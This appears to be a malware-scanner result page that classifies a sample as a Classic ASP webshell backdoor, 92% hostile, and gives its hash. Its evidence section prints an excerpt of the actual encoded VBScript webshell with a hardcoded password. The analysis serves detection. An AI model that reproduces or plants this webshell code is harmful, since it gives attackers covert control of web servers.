Hostile 92% Download

Backdoor.ASP.Ace.fi

Known ASP webshell backdoor

Script-encoded ASP uses a hardcoded passwordWebshell in VBscript or JScript encoded using *.Encode plus a suspicious string
SHA-2567f7c802e59fad9f0c4c3ff841a9a6f55c4f0402f2c3eb532977f5ed7e2de75b9
MaleculeO(C)Th

Evidence

Hardcodes a Classic ASP login password line 0
0<%@ LANGUAGE = VBScript.Encode %><% UserPass="@2Kjiaweng" '�޸����� mName="����WEBSHELL������ǿ��" SiteURL="http://www.dangdang.com" '��վ Copyright="����WEBSHELL������ǿ��" '��Ȩ AD="����WEBSHELL������ǿ��" '״̬��������� #@~^JFYBAA==jD-Dc?mMkaOKb:nW!Yx1O,,O1,O,)"ndwKxk+ A;W6+.P{OD!+l6 P2..KD~Id!:n,16Y=/!8PUtGhAD.c*)q6~2MDP:4nx@#@&"IjJ@!8M@*@!l,4D0xvNl\Cd1DrwDl4kdDWMXR(l1V`*B@*@!(D@*~rP[,3DMRfd^DbwDkGx~',J@!zm@*@!(D@*E@#@&2..cZs+m.=InkwKx/RwsEkt@#@&Ax[~&0@#@&nx9P/!8l?!4,

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.